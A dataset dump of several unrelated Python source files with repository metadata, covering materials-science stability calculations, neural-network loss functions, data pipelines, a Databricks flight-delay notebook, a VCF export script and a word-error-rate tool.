| 27.819672 | 113 | 0.57749 | 389 | 3,394 | 4.784062 | 0.285347 | 0.041376 | 0.032241 | 0.013971 | 0.017195 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004316 | 0.317325 | 3,394 | 121 | 114 | 28.049587 | 0.798878 | 0.051267 | 0 | 0.170455 | 0 | 0 | 0.012449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.034091 | 0.022727 | 0.295455 | 0.011364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f095d1388f9625e63f8d8fbeb39317cd585f8c | 68 | py | Python | Python/Books/Learning-Programming-with-Python.Tamim-Shahriar-Subeen/chapter-009.01-list/ph-9.11-list-del-function.py | shihab4t/Books-Code | b637b6b2ad42e11faf87d29047311160fe3b2490 | [
"Unlicense"
] | null | null | null | Python/Books/Learning-Programming-with-Python.Tamim-Shahriar-Subeen/chapter-009.01-list/ph-9.11-list-del-function.py | shihab4t/Books-Code | b637b6b2ad42e11faf87d29047311160fe3b2490 | [
"Unlicense"
] | null | null | null | Python/Books/Learning-Programming-with-Python.Tamim-Shahriar-Subeen/chapter-009.01-list/ph-9.11-list-del-function.py | shihab4t/Books-Code | b637b6b2ad42e11faf87d29047311160fe3b2490 | [
"Unlicense"
] | null | null | null | li = [1, 2, 3, 3, 4, 5, 6]
del(li[1])
print(li)
del(li)
print(li)
| 8.5 | 26 | 0.5 | 17 | 68 | 2 | 0.529412 | 0.176471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 0.220588 | 68 | 7 | 27 | 9.714286 | 0.490566 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e5f0bb1e5a4c34450975dee81ee353ebb2c952b3 | 9,769 | py | Python | Old_Files/QuickPool_Old.py | PV-Lab/stability | d18da803a399a7c338b225b0d6adbdfe1b427707 | [
"MIT"
] | null | null | null | Old_Files/QuickPool_Old.py | PV-Lab/stability | d18da803a399a7c338b225b0d6adbdfe1b427707 | [
"MIT"
] | null | null | null | Old_Files/QuickPool_Old.py | PV-Lab/stability | d18da803a399a7c338b225b0d6adbdfe1b427707 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 4 18:07:03 2019
@author: NickT
"""
from pymatgen import MPRester
import pandas as pd
import matplotlib.pyplot as plt
import csv
import multiprocessing as mp
import pickle
import tqdm
import time
mat_api_key = '<ENTER API KEY>'
mpr = MPRester(mat_api_key)
print("Loading Compounds....")
file = open('MPDatabase.pickle', 'rb')
all_compounds1 = pickle.load(file)
all_compounds = []
for compound in all_compounds1:
if compound['nsites'] == sum(compound['unit_cell_formula'].values()):
all_compounds.append(compound)
criteria = float(input("Enter Stable Phase Criteria in meV: "))
#def find_stable_phases(compound):
# '''
# find all compounds with e_above_hull within given range of zero
# '''
# if abs(compound['e_above_hull']) < criteria/1000:
# return compound
print('Finding Stable Phases....')
stable_phase = []
for compound in tqdm.tqdm(all_compounds): #find all compounds with e_above_hull within 0.05 of 0
if abs(compound['e_above_hull']) < criteria/1000:
stable_phase.append(compound)
#pool = mp.Pool(processes=1)
#
#stable_phase = list(tqdm.tqdm(pool.imap(find_stable_phases, all_compounds), total=86680))
######## COMPETING PHASE AND OXIDE CALCULATION ########
def find_comp(stable_oxides, compound_unit_cell, compound_formE, condition):
'''
Finds complementary oxide or competing phases group and associated total heat of oxidation
args:
stable_oxides = list of dictionaries of stable oxides or competing phases with
lower formation energy than original material
compound_unit_cell = dict of elements in unit cell of original compound
ompound_formE = formation energy of original compound
condition = string dictating whether it is for comp oxide or comp competing phases
output:
tuple: (list of dicitionatries of predicted materials,
combined formation energy of these materials (with appropriate ratios),
whether this combined formE is lower than that of original material (boolean))
notes:
intersect_rank: used to find limiting element by finding ratio of normalised stochiometry
between original material and oxide
'''
result = []
FinishEarly = False
#what if positive formE
orig_natoms = sum(compound_unit_cell.values())
compound_unit_cell1 = dict((a, b/orig_natoms) for a, b in compound_unit_cell.items()) #normalise stoichiometry
for oxide in stable_oxides:
oxide['el_weight'] = dict((a, b/oxide['nsites']) for a, b in oxide['unit_cell_formula'].items()) #normalise stoichiometry
if condition == 'Oxide':
del oxide['el_weight']['O']
oxide['ranker'] = dict((a, b/compound_unit_cell1[a]) for a, b in oxide['el_weight'].items()) #find greedy ranking parameter
oxide['ranking_no'] = sum(oxide['ranker'].values())
sort_oxides = sorted(stable_oxides, key = lambda oxide: (oxide['formation_energy_per_atom']/oxide['ranking_no']))
sort_oxides1 = sort_oxides[:]
total_formE = 0
while sum(compound_unit_cell1.values()) != 0 and sort_oxides1 != []: #if all atoms in unit cell not yet accounted for
oxide = sort_oxides1[0]
intersection = list(set(oxide['elements']).intersection(compound_unit_cell1.keys()))
if intersection == []:
print(compound_unit_cell)
print(oxide['unit_cell_formula'])
print(oxide['nsites'])
intersect_rank = {}
for element in intersection:
intersect_rank[element] = compound_unit_cell1[element]/ oxide['el_weight'][element]
limiting_element = min(intersect_rank, key=intersect_rank.get) #find limiting element
ratio = intersect_rank[limiting_element] #(value)
used_up_elements = []
for element in intersection:
compound_unit_cell1[element] = compound_unit_cell1[element] - (ratio * oxide['el_weight'][element])
if abs(compound_unit_cell1[element]) < 0.0001: #inequality because of != 0 problem
used_up_elements.append(element)
result.append(oxide)
sort_oxides1.remove(oxide)
total_formE += oxide['formation_energy_per_atom']*ratio
sort_oxides1 = [oxide for oxide in sort_oxides1 if
len(set(oxide['elements']).intersection(used_up_elements)) == 0]
#remove oxides in list which arent useful (dont have new elements)
if sort_oxides1 == [] and abs(sum(compound_unit_cell1.values())) > 0.0001: #inequality because of != 0 problem
print(compound_unit_cell1)
FinishEarly = True
return (result, total_formE, total_formE-compound_formE, len(result), FinishEarly)
#### FOR TESTING FIND_OXIDES
ABCO4 = {'elements': ['A', 'B', 'C', 'O'], 'formation_energy_per_atom': -750, 'nsites':7,
'unit_cell_formula':{'A':1, 'B':1, 'C':1, 'O':4}}
AO = {'elements': ['A', 'O'], 'formation_energy_per_atom': -100, 'nsites':8,
'unit_cell_formula':{'A':4, 'O':4}}
BO2 = {'elements': ['B', 'O'], 'formation_energy_per_atom': -100, 'nsites':6,
'unit_cell_formula':{'B':2, 'O':4}}
C2O = {'elements': ['C', 'O'], 'formation_energy_per_atom': -300, 'nsites':24,
'unit_cell_formula':{'C':16, 'O':8}}
A2BO6 = {'elements': ['A', 'B', 'O'], 'formation_energy_per_atom': -380, 'nsites':9,
'unit_cell_formula':{'A':2, 'B':1, 'O':6}}
A2CO4 = {'elements': ['A', 'C', 'O'], 'formation_energy_per_atom': -620, 'nsites':63,
'unit_cell_formula':{'A':18, 'C':9, 'O':36}}
original = {'A':4, 'B':8, 'C':10}
listt = [ABCO4, AO, BO2, C2O, A2BO6, A2CO4]
find_comp(listt, original, -400, 'Oxide')
####
def Make_Property_Dict(compound):
'''
Function to be iterated over all compounds.
'''
PDict = {}
global stable_phase
if abs(compound['e_above_hull']) < criteria/1000: #if stable
#### FOR NUM PHASES
competing_phases_id_withform1 = []
competing_phase_no1 = 0
comp_listdict =[]
#### FOR NUM OXIDES
v_ratio2 = 0
oxide_no1 = 0
oxides_id_withform1 = []
v_ratio_id2 = 'n/a'
oxide_listdict = []
elements = compound['elements']
for i in stable_phase:
#### FOR NUM PHASES
if set(i['elements']).issubset(elements):
comp_listdict.append(i) #for find_comp
if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']:
#find all other phases containing just those elements
competing_phase_no1 +=1
competing_phases_id_withform1.append(i['task_id'])
#### FOR NUM OXIDES
if 'O' in i['elements']:
el = i['elements'][:]
el.remove('O')
O = i['unit_cell_formula']['O']
if set(el).issubset(elements) and O != i['nsites']:
oxide_listdict.append(i) #for find_comp
if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']:
oxide_no1 += 1
oxides_id_withform1.append(i['task_id'])
#### FOR NUM PHASES
PDict['task_id'] = compound['task_id']
PDict['Formula'] = compound['pretty_formula']
PDict['Bandgap /eV'] = compound['band_gap']
PDict['Competing Phase Number (with formation E correction)'] = competing_phase_no1
PDict['Competing Phase List (with formation E correction)'] = competing_phases_id_withform1
y = find_comp(comp_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'NotOx')
PDict['Complementary Competing Phase List'] = y[0]
PDict['Complementary Heat of Decomposition'] = y[1]
PDict['Lower Formation Energy Than Original Material'] = y[2]
PDict['Number of Complementary Phases'] = y[3]
PDict['Early Finish1'] = y[4]
#### FOR NUM OXIDES
PDict['Number of Oxides (with formation E correction)'] = oxide_no1
PDict['Oxide List (with formation E correction)'] = oxides_id_withform1
x = find_comp(oxide_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'Oxide')
PDict['Complementary Oxide List'] = x[0]
PDict['Complementary Heat of Oxidation'] = x[1]
PDict['Lower Formation Energy Than Original Material'] = x[2]
PDict['Number of Complementary Oxides'] = x[3]
PDict['Early Finish2'] = x[4]
v_ratio2 = 1000
for i in x[0]:
v2 = i['volume']/compound['volume']
if abs(v2 - 1) < abs(v_ratio2 - 1):
v_ratio2 = v2
v_ratio_id2 = i
PDict['Best Volume Ratio'] = v_ratio_id2
PDict['ID of Best Volume Ratio'] = v_ratio2
return PDict
if __name__ == '__main__':
pool = mp.Pool(processes=16)
print('Calculating Data....')
DictList = list(tqdm.tqdm(pool.imap(Make_Property_Dict, all_compounds), total=len(all_compounds)))
FinalDF = pd.DataFrame(DictList)
filename = 'FinalDF_' + str(criteria) + '.pckl'
f = open(filename, 'wb')
pickle.dump(FinalDF, f)
f.close()
print('Done.')
| 37.003788 | 131 | 0.604873 | 1,192 | 9,769 | 4.758389 | 0.234899 | 0.026798 | 0.044429 | 0.054302 | 0.234133 | 0.165903 | 0.130642 | 0.108075 | 0.050071 | 0.050071 | 0 | 0.026038 | 0.272699 | 9,769 | 263 | 132 | 37.144487 | 0.772273 | 0.193776 | 0 | 0.041667 | 0 | 0 | 0.21372 | 0.045472 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013889 | false | 0 | 0.055556 | 0 | 0.083333 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f19e16e2b08093649aea79bf01a6ebe7b3786c | 1,638 | py | Python | lhq_nn_lib/layers/loss.py | lhq1208/DL_lib | 53c99157efcc36f2288a82eedad09cdecda579e5 | [
"Apache-2.0"
] | null | null | null | lhq_nn_lib/layers/loss.py | lhq1208/DL_lib | 53c99157efcc36f2288a82eedad09cdecda579e5 | [
"Apache-2.0"
] | null | null | null | lhq_nn_lib/layers/loss.py | lhq1208/DL_lib | 53c99157efcc36f2288a82eedad09cdecda579e5 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from layers.activation_layer import *
from layers.gradient_check import *
def mean_square_error_loss(y_hat, y):
"""
MSE loss, loss=mean(y_hat-y)^2
:param y_hat: output of the network
:param y: input labels
:return: MSE loss
"""
loss = np.mean((y_hat - y) ** 2)
num_output = y.shape[1]
d_loss = 2 * (y_hat - y) / num_output
return loss, d_loss
def cross_entropy_loss(y_hat, y):
"""
Cross entropy loss, loss = -sum(yi * log(y_hat))
:param y_hat: output of the network
:param y: input labels (one_hot)
:return: cross entropy loss
"""
loss = -np.sum(y * np.log(y_hat), axis=1)
# loss = np.mean(loss, axis=0)
d_loss = -y / y_hat
return loss, d_loss
def softmax_loss(x, y):
shifted_logits = x - np.max(x, axis=1, keepdims=True)
Z = np.sum(np.exp(shifted_logits), axis=1, keepdims=True)
log_probs = shifted_logits - np.log(Z)
probs = np.exp(log_probs)
N = x.shape[0]
loss = -np.sum(log_probs[np.arange(N), y]) / N
dx = probs.copy()
dx[np.arange(N), y] -= 1
dx /= N
return loss, dx
if __name__ == '__main__':
np.random.seed(231)
num_classes, num_inputs = 10, 50
x = 0.001 * np.random.randn(num_inputs, num_classes)
y = np.random.randint(num_classes, size=num_inputs)
dx_num = eval_numerical_gradient(lambda x: softmax_loss(x, y)[0], x, verbose=False)
loss, dx = softmax_loss(x, y)
# Test softmax_loss function. Loss should be 2.3 and dx error should be 1e-8
print('\nTesting softmax_loss:')
print('loss: ', loss)
print('dx error: ', rel_error(dx_num, dx))
| 27.762712 | 87 | 0.632479 | 276 | 1,638 | 3.557971 | 0.304348 | 0.040733 | 0.025458 | 0.039715 | 0.14664 | 0.089613 | 0.089613 | 0.089613 | 0.089613 | 0.089613 | 0 | 0.020586 | 0.228938 | 1,638 | 58 | 88 | 28.241379 | 0.756928 | 0.218559 | 0 | 0.060606 | 0 | 0 | 0.03843 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f2b2946d7fb399e25a69e9d6f0ee5cf294595b | 2,518 | py | Python | clearmash/prep_entities_for_search.py | Beit-Hatfutsot/mojp-dbs-pipelines | 7bac0da9c1777351f40f422c664a7168b52e218a | [
"MIT"
] | 1 | 2017-06-21T11:36:01.000Z | 2017-06-21T11:36:01.000Z | clearmash/prep_entities_for_search.py | Beit-Hatfutsot/mojp-dbs-pipelines | 7bac0da9c1777351f40f422c664a7168b52e218a | [
"MIT"
] | 66 | 2017-05-09T11:48:50.000Z | 2018-01-02T11:57:26.000Z | clearmash/prep_entities_for_search.py | Beit-Hatfutsot/mojp-dbs-pipelines | 7bac0da9c1777351f40f422c664a7168b52e218a | [
"MIT"
] | 2 | 2017-04-25T09:07:15.000Z | 2017-06-15T10:35:36.000Z | from datapackage_pipelines.wrapper import ingest, spew
from datapackage_pipelines.utilities.resources import PROP_STREAMING
from bs4 import BeautifulSoup
parameters, datapackage, resources = ingest()
def get_resource():
for resource in resources:
for row in resource:
if row["collection"] == parameters["collection-name"] and row["display_allowed"]:
doc = row["parsed_doc"]
item = {"doc_id": "clearmash_{}".format(row["id"]),
"source": "clearmash",
"collection": parameters["collection-name"],
"title_he": doc.get("entity_name", {}).get("he", ""),
"title_en": doc.get("entity_name", {}).get("en", ""),
"content_html_he": doc.get("_c6_beit_hatfutsot_bh_base_template_description", {}).get("he", ""),
"content_html_en": doc.get("_c6_beit_hatfutsot_bh_base_template_description", {}).get("en", "")}
item.update(content_text_he=' '.join(BeautifulSoup(item["content_html_he"], "lxml").findAll(text=True)),
content_text_en=' '.join(BeautifulSoup(item["content_html_en"], "lxml").findAll(text=True)))
yield item
datapackage["resources"] = [{PROP_STREAMING: True,
"name": parameters["resource-name"],
"path": "{}.csv".format(parameters["resource-name"]),
"schema": {"fields": [{'name': 'doc_id', 'type': 'string', 'es:index': False},
{"name": "source", "type": "string", "es:index": False},
{"name": "collection", "type": "string", "es:index": False},
{"name": "title_he", "type": "string"},
{"name": "title_en", "type": "string"},
{"name": "content_html_he", "type": "string", "es:index": False},
{"name": "content_html_en", "type": "string", "es:index": False},
{"name": "content_text_he", "type": "string"},
{"name": "content_text_en", "type": "string"},],
"primaryKey": ["doc_id"]}}]
spew(datapackage, [get_resource()])
| 61.414634 | 120 | 0.470612 | 221 | 2,518 | 5.126697 | 0.285068 | 0.079435 | 0.052957 | 0.075022 | 0.303619 | 0.213592 | 0.144748 | 0.086496 | 0.086496 | 0.086496 | 0 | 0.00189 | 0.369738 | 2,518 | 40 | 121 | 62.95 | 0.712035 | 0 | 0 | 0 | 0 | 0 | 0.26251 | 0.037331 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.090909 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f2df89ffd4743d543ef9c3d879f0b8408bef7f | 2,011 | py | Python | flight-data/adb_7_eda.py | plzm/azure-databricks | 29884a184698a034a7e5c25ac5b80d36757b2fff | [
"MIT"
] | null | null | null | flight-data/adb_7_eda.py | plzm/azure-databricks | 29884a184698a034a7e5c25ac5b80d36757b2fff | [
"MIT"
] | null | null | null | flight-data/adb_7_eda.py | plzm/azure-databricks | 29884a184698a034a7e5c25ac5b80d36757b2fff | [
"MIT"
] | null | null | null | # Databricks notebook source
# MAGIC %md
# MAGIC References
# MAGIC
# MAGIC https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrameStatFunctions<br>
# MAGIC https://docs.azuredatabricks.net/user-guide/visualizations/index.html<br>
# COMMAND ----------
# MAGIC %md
# MAGIC #### Get a dataframe for notebook tasks
# COMMAND ----------
# MAGIC %run ./adb_3_ingest_to_df
# COMMAND ----------
# MAGIC %md
# MAGIC ### Data exploration
# COMMAND ----------
df_flights_full.printSchema()
# COMMAND ----------
df_flights_full.count()
# COMMAND ----------
# See if there are duplicate rows - if so, this will differ from just count()
df_flights_full.distinct().count()
# COMMAND ----------
# How many duplicates?
df_flights_full.count() - df_flights_full.dropDuplicates().count()
# COMMAND ----------
# How many duplicates and missing values?
df_flights_full.count() - df_flights_full.dropDuplicates().dropna(how="any", subset=["DepDelay", "ArrDelay"]).count()
# COMMAND ----------
# Summary statistics
display(df_flights_full.describe())
# COMMAND ----------
# Descriptive stats may not make sense for all columns in the df, so let's just get desc stats for a subset
display(df_flights_full.describe().select("summary", "DepDelay", "ArrDelay"))
# COMMAND ----------
# Get top rows - head(n) or take(n)
display(df_flights_full.head(5))
# COMMAND ----------
df_flights_full.show(Truncate=False)
# COMMAND ----------
# limit(n), head(n), take(n)
display(df_flights_full.head(7))
# COMMAND ----------
df_flights_full.explain()
# COMMAND ----------
# MAGIC %md
# MAGIC #### Stats
# COMMAND ----------
df_flights_full.approxQuantile("ArrDelay", [0.25, 0.5, 0.75], 0.1)
# COMMAND ----------
display(df_flights_full.freqItems(["DestAirportID"]))
# COMMAND ----------
# Check correlation between two fields
df_flights_full.corr("DepDelay", "ArrDelay")
# COMMAND ----------
display(df_flights_full.select("DepDelay", "ArrDelay"))
# COMMAND ----------
| 19.336538 | 117 | 0.655893 | 251 | 2,011 | 5.103586 | 0.442231 | 0.119438 | 0.172521 | 0.093677 | 0.246682 | 0.115535 | 0.115535 | 0.070258 | 0 | 0 | 0 | 0.007407 | 0.1273 | 2,011 | 103 | 118 | 19.524272 | 0.722507 | 0.56191 | 0 | 0 | 0 | 0 | 0.115012 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5f31ec7b6d809900feb1de6c282c008dc5ae47f | 50 | py | Python | tools/onnx2daq/python/onnx2daq/__init__.py | Anon-Artist/DNNLibrary | 6e38a880a90c28ff238a80f44c7d35ffd3eedae8 | [
"Apache-2.0"
] | 199 | 2019-02-14T05:44:27.000Z | 2022-03-29T09:48:35.000Z | tools/onnx2daq/python/onnx2daq/__init__.py | Anon-Artist/DNNLibrary | 6e38a880a90c28ff238a80f44c7d35ffd3eedae8 | [
"Apache-2.0"
] | 26 | 2019-02-18T07:18:17.000Z | 2021-05-29T11:42:08.000Z | tools/onnx2daq/python/onnx2daq/__init__.py | Anon-Artist/DNNLibrary | 6e38a880a90c28ff238a80f44c7d35ffd3eedae8 | [
"Apache-2.0"
] | 33 | 2019-02-16T09:23:46.000Z | 2022-02-19T07:24:22.000Z | from .convert import convert, simplify_and_convert | 50 | 50 | 0.88 | 7 | 50 | 6 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 50 | 1 | 50 | 50 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 5 |
e5f5488490016c728274b70ed9f953908256998b | 1,788 | py | Python | reanalysis/mt_to_vcf.py | populationgenomics/automated-interpretation-pipeline | 64afbf396dcc2f4f2330cdfd0414238560910e93 | [
"MIT"
] | null | null | null | reanalysis/mt_to_vcf.py | populationgenomics/automated-interpretation-pipeline | 64afbf396dcc2f4f2330cdfd0414238560910e93 | [
"MIT"
] | 4 | 2022-03-28T06:28:01.000Z | 2022-03-31T00:16:02.000Z | reanalysis/mt_to_vcf.py | populationgenomics/automated-interpretation-pipeline | 64afbf396dcc2f4f2330cdfd0414238560910e93 | [
"MIT"
] | null | null | null | """
Takes an input MT, and extracts a VCF-format representation.
This is currently required as the end-to-end CPG pipeline doesn't currently
store intermediate files. To simulate workflows running on VCF files, we
have to regenerate a VCF representation from a MT.
Optional argument allows the specification of an 'additional header' file
When Hail extracts a VCF from a MT, it doesn't contain any custom field
definitions, e.g. 'VQSR' as a Filter field. This argument allows us to
specify additional lines which are required to make the final output valid
within the VCF specification
"""
from typing import Optional
from argparse import ArgumentParser
import hail as hl
from cpg_utils.hail_batch import init_batch
def main(input_mt: str, output_path: str, additional_header: Optional[str] = None):
"""
takes an input MT, and reads it out as a VCF
:param input_mt:
:param output_path:
:param additional_header: file containing lines to append to header
:return:
"""
init_batch()
matrix = hl.read_matrix_table(input_mt)
hl.export_vcf(
matrix,
output_path,
append_to_header=additional_header,
tabix=True,
)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument(
'--input',
type=str,
help='input MatrixTable path',
)
parser.add_argument('--output', type=str, help='path to write VCF out to')
parser.add_argument(
'--additional_header',
type=str,
help='path to file containing any additional header lines',
required=False,
default=None,
)
args = parser.parse_args()
main(
input_mt=args.input,
output_path=args.output,
additional_header=args.additional_header,
)
| 28.380952 | 83 | 0.69519 | 247 | 1,788 | 4.890688 | 0.404858 | 0.10596 | 0.042219 | 0.023179 | 0.056291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229306 | 1,788 | 62 | 84 | 28.83871 | 0.876633 | 0.414989 | 0 | 0.117647 | 0 | 0 | 0.138034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.117647 | 0 | 0.147059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5f5c14f40a001a742cdc89ea72f7c6f1ffa6230 | 3,787 | py | Python | asrtoolkit/wer.py | kaleko/greenkey-asrtoolkit | a729e25ae9c1c65b3c9f25438eb67dba8d03a730 | [
"Apache-2.0"
] | null | null | null | asrtoolkit/wer.py | kaleko/greenkey-asrtoolkit | a729e25ae9c1c65b3c9f25438eb67dba8d03a730 | [
"Apache-2.0"
] | 1 | 2020-02-07T19:20:07.000Z | 2020-02-07T19:27:19.000Z | asrtoolkit/wer.py | kaleko/greenkey-asrtoolkit | a729e25ae9c1c65b3c9f25438eb67dba8d03a730 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Python function for computing word error rates metric for Automatic Speech Recognition files
"""
import argparse
import re
import editdistance
from asrtoolkit.clean_formatting import clean_up
from asrtoolkit.data_structures.time_aligned_text import time_aligned_text
from asrtoolkit.file_utils.script_input_validation import assign_if_valid
# defines global regex for tagged noises and silence
re_tagged_nonspeech = re.compile(r"[\[<][A-Za-z #]*[\]>]")
# defines global regex to remove these nsns
nonsilence_noises = [
"noise",
"um",
"ah",
"er",
"umm",
"uh",
"mm",
"mn",
"mhm",
"mnh",
"huh",
"hmm",
]
re_nonsilence_noises = re.compile(r"\b({})\b".format(
"|".join(nonsilence_noises)))
def remove_nonsilence_noises(input_text):
"""
Removes nonsilence noises from a transcript
"""
return re.sub(re_nonsilence_noises, "", input_text)
def wer(ref, hyp, remove_nsns=False):
"""
Calculate word error rate between two string or time_aligned_text objects
>>> wer("this is a cat", "this is a dog")
25.0
"""
# accept time_aligned_text objects too
if type(ref) == time_aligned_text:
ref = ref.text()
if type(hyp) == time_aligned_text:
hyp = hyp.text()
# remove tagged noises and other nonspeech events
ref = re.sub(re_tagged_nonspeech, " ", ref)
hyp = re.sub(re_tagged_nonspeech, " ", hyp)
# optionally, remove non silence noises
if remove_nsns:
ref = remove_nonsilence_noises(ref)
hyp = remove_nonsilence_noises(hyp)
# clean punctuation, etc.
ref = clean_up(ref)
hyp = clean_up(hyp)
# calculate WER
return (100 * editdistance.eval(ref.split(" "), hyp.split(" ")) /
max(1, len(ref.split(" "))))
def cer(ref, hyp, remove_nsns=False):
"""
Calculate character error rate between two strings or time_aligned_text objects
>>> cer("this cat", "this bad")
25.0
"""
# accept time_aligned_text objects too
if type(ref) == time_aligned_text:
ref = ref.text()
if type(hyp) == time_aligned_text:
hyp = hyp.text()
if remove_nsns:
ref = remove_nonsilence_noises(ref)
hyp = remove_nonsilence_noises(hyp)
ref = clean_up(ref)
hyp = clean_up(hyp)
# calculate per line CER
return 100 * editdistance.eval(ref, hyp) / max(1, len(ref))
def main():
parser = argparse.ArgumentParser(
description=
"Compares a reference and transcript file and calculates word error rate (WER) between these two files"
)
parser.add_argument(
"reference_file",
metavar="reference_file",
type=str,
help='reference "truth" file',
)
parser.add_argument(
"transcript_file",
metavar="transcript_file",
type=str,
help="transcript possibly containing errors",
)
parser.add_argument(
"--char-level",
help="calculate character error rate instead of word error rate",
action="store_true",
)
parser.add_argument(
"--ignore-nsns",
help="ignore non silence noises like um, uh, etc.",
action="store_true",
)
# parse arguments
args = parser.parse_args()
# read files from arguments
ref = assign_if_valid(args.reference_file)
hyp = assign_if_valid(args.transcript_file)
if ref is None or hyp is None:
print(
"Error with an input file. Please check all files exist and are accepted by ASRToolkit"
)
elif args.char_level:
print("CER: {:5.3f}%".format(cer(ref, hyp, args.ignore_nsns)))
else:
print("WER: {:5.3f}%".format(wer(ref, hyp, args.ignore_nsns)))
if __name__ == "__main__":
main()
| 25.587838 | 111 | 0.639028 | 491 | 3,787 | 4.749491 | 0.321792 | 0.04717 | 0.064322 | 0.037736 | 0.282161 | 0.201544 | 0.175815 | 0.175815 | 0.175815 | 0.145798 | 0 | 0.006298 | 0.245313 | 3,787 | 147 | 112 | 25.761905 | 0.809657 | 0.19831 | 0 | 0.288889 | 0 | 0 | 0.185724 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.066667 | 0 | 0.144444 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |